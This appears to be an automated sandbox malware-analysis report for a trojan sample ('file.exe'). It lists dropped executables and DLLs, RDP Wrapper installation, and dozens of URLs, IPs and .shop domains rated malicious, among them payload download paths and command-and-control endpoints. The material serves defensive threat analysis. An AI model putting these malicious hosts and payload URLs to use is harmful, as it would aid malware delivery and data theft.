IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5de72d9ebd_rdp[1].exe	100%	Avira	HEUR/AGEN.1311769
C:\ProgramData\JKEHIIJJEC.exe	100%	Avira	HEUR/AGEN.1311769
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5de72d9ebd_rdp[1].exe	100%	Joe Sandbox ML
C:\ProgramData\JKEHIIJJEC.exe	100%	Joe Sandbox ML
C:\Program Files\RDP Wrapper\rdpwrap.dll	54%	ReversingLabs	Win64.PUA.RDPWrapper
C:\ProgramData\EBAAFCAFCB.exe	43%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\ProgramData\KECGDBFCBK.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5db9e54794_vfkagks[1].exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5dbaca34ac_lfdnsafnds[1].exe	43%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	47%	ReversingLabs	Win32.PUA.RDPWrap
C:\Windows\System32\rfxvmt.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
http://www.entrust.net/rpa03	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/	0%	URL Reputation	safe
https://recaptcha.net/recaptcha/;	0%	URL Reputation	safe
https://steamcommunity.com/0D	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	0%	Avira URL Cloud	safe
https://steamcommunity.com/00	0%	Avira URL Cloud	safe
https://5.75.211.162/ramData	100%	Avira URL Cloud	malware
https://5.75.211.162/sqlp.dllw	100%	Avira URL Cloud	malware
https://reinforcenh.shop/api	100%	Avira URL Cloud	malware
stogeneratmns.shop	100%	Avira URL Cloud	malware
https://5.75.211.162/vcruntime140.dll	100%	Avira URL Cloud	malware
http://cowod.hopto.org_DEBUG.zip/c	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	0%	Avira URL Cloud	safe
http://crl.entrust.net/ts1ca.crl0	0%	URL Reputation	safe
https://login.steampowered.com/	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	0%	URL Reputation	safe
wallkedsleeoi.shop	100%	Avira URL Cloud	malware
http://aia.entrust.net/ts1-chain256.cer01	0%	URL Reputation	safe
https://fragnantbui.shop/	100%	Avira URL Cloud	malware
https://store.steampowered.com/	0%	URL Reputation	safe
https://cdn.akamai.steamstatic.c	0%	Avira URL Cloud	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://api.steampowered.com/	0%	URL Reputation	safe
https://store.steampowered.com/mobile	0%	URL Reputation	safe
https://s.ytimg.com;	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	0%	URL Reputation	safe
https://5.75.211.162HDGCB	0%	Avira URL Cloud	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.	0%	Avira URL Cloud	safe
https://player.vimeo.com	0%	URL Reputation	safe
https://www.youtube.com/	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	0%	Avira URL Cloud	safe
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
fragnantbui.shop	100%	Avira URL Cloud	malware
offensivedzvju.shop	100%	Avira URL Cloud	malware
https://5.75.211.162/sqlp.dll~	100%	Avira URL Cloud	malware
https://5.75.211.162DHIEC	0%	Avira URL Cloud	safe
https://www.google.com/recaptcha/	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199780418869/inventory/	100%	Avira URL Cloud	malware
https://store.steampowered.com/;Persistent-AuthWWW-Au	0%	Avira URL Cloud	safe
https://5.75.211.162DAAAA	0%	Avira URL Cloud	safe
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66f5de72d9ebd_rdp.exe	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869	100%	Avira URL Cloud	malware
https://steamcommunity.com/S	0%	Avira URL Cloud	safe
https://offensivedzvju.shop/pi	100%	Avira URL Cloud	malware
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1222150http://147.45.44.104/prog/66f5db9e	100%	Avira URL Cloud	malware
http://147.45.44.104	100%	Avira URL Cloud	malware
https://steamcommunity.com/workshop/	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;	100%	Avira URL Cloud	malware
https://fragnantbui.shop/HDQ	100%	Avira URL Cloud	malware
https://5.75.211.162/softokn3.dll	100%	Avira URL Cloud	malware
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;	100%	Avira URL Cloud	malware
https://5.75.211.162ta	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU	0%	Avira URL Cloud	safe
https://ballotnwu.site/api8D	0%	Avira URL Cloud	safe
https://stogeneratmns.shop/api	100%	Avira URL Cloud	malware
http://127.0.0.1:27060	0%	Avira URL Cloud	safe
https://5.75.211.162/gz	100%	Avira URL Cloud	malware
https://ghostreedmnu.shop/api	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	Avira URL Cloud	safe
http://hansgborn.eu	0%	Avira URL Cloud	safe
https://5.75.211.1620.5938.132	0%	Avira URL Cloud	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta	0%	Avira URL Cloud	safe
https://5.75.211.162/	100%	Avira URL Cloud	malware
https://5.75.211.162/j9	100%	Avira URL Cloud	malware
http://api.ipify.orgd	0%	Avira URL Cloud	safe
reinforcenh.shop	100%	Avira URL Cloud	malware
http://cowod.hopto.org	0%	Avira URL Cloud	safe
http://hansgborn.eud	0%	Avira URL Cloud	safe
https://steamcommunity.com/?subsection=broadcasts	0%	Avira URL Cloud	safe
https://5.75.211.162/mozglue.dll	100%	Avira URL Cloud	malware
https://hansgborn.eu/receive.php	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199780418869/badges	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fragnantbui.shop	188.114.97.3	true	true	unknown
gutterydhowi.shop	172.67.132.32	true	true	unknown
cowod.hopto.org	45.132.206.251	true	true	unknown
offensivedzvju.shop	188.114.96.3	true	true	unknown
drawzhotdog.shop	104.21.58.182	true	true	unknown
ghostreedmnu.shop	188.114.96.3	true	true	unknown
ballotnwu.site	104.21.2.13	true	true	unknown
wallkedsleeoi.shop	104.21.36.139	true	true	unknown
hansgborn.eu	188.114.96.3	true	true	unknown
steamcommunity.com	104.102.49.254	true	true	unknown
stogeneratmns.shop	188.114.97.3	true	true	unknown
reinforcenh.shop	104.21.77.130	true	true	unknown
api.ipify.org	104.26.12.205	true	false	unknown
vozmeatillu.shop	188.114.96.3	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
stogeneratmns.shop	true	Avira URL Cloud: malware	unknown
https://reinforcenh.shop/api	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
wallkedsleeoi.shop	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
fragnantbui.shop	true	Avira URL Cloud: malware	unknown
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe	true	Avira URL Cloud: malware	unknown
offensivedzvju.shop	true	Avira URL Cloud: malware	unknown
http://147.45.44.104/prog/66f5de72d9ebd_rdp.exe	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199780418869	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/softokn3.dll	true	Avira URL Cloud: malware	unknown
https://stogeneratmns.shop/api	true	Avira URL Cloud: malware	unknown
https://ghostreedmnu.shop/api	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/	true	Avira URL Cloud: malware	unknown
reinforcenh.shop	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/mozglue.dll	true	Avira URL Cloud: malware	unknown
https://hansgborn.eu/receive.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	JJJJKE.3.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	JJJJKE.3.dr	false	URL Reputation: safe	unknown
https://5.75.211.162/sqlp.dllw	RegAsm.exe, 00000003.00000002.2126523047.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2189236179.000000000144F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000051F000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://5.75.211.162/ramData	RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/0D	RegAsm.exe, 0000000C.00000002.2189236179.0000000001445000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/00	RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.org_DEBUG.zip/c	file.exe, 00000000.00000002.1436795595.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004C2000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004D4000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000051F000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	file.exe, 00000000.00000002.1436795595.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KECGDBFCBK.exe, 0000000D.00000002.2068049031.0000000003ACB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000437000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.akamai.steamstatic.c	RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://s.ytimg.com;	RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	JKEHIIJJEC.exe, 00000010.00000002.2514195438.0000000002481000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://fragnantbui.shop/	RegAsm.exe, 0000000C.00000002.2189236179.0000000001445000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://5.75.211.162HDGCB	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2189236179.000000000144F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000051F000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.entrust.net/rpa03	file.exe, KECGDBFCBK.exe.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	JJJJKE.3.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.	RegAsm.exe, 00000003.00000002.2126523047.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, BAECFH.3.dr	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	JJJJKE.3.dr	false	URL Reputation: safe	unknown
https://lv.queniujq.cn	RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	RegAsm.exe, 0000000C.00000002.2189236179.000000000144F000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://www.youtube.com/	RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://5.75.211.162/sqlp.dll~	RegAsm.exe, 00000003.00000002.2126523047.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/recaptcha/	RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://checkout.steampowered.com/	RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://5.75.211.162DHIEC	RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	RegAsm.exe, 00000003.00000002.2126523047.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, BAECFH.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	file.exe, KECGDBFCBK.exe.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://help.steampowered.com/en/	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/	RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/;Persistent-AuthWWW-Au	RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://recaptcha.net/recaptcha/;	RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://5.75.211.162DAAAA	RegAsm.exe, 0000000F.00000002.2525117231.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199780418869/inventory/	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a	RegAsm.exe, 0000000F.00000002.2525117231.000000000051F000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/S	RegAsm.exe, 00000003.00000002.2126523047.0000000001023000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
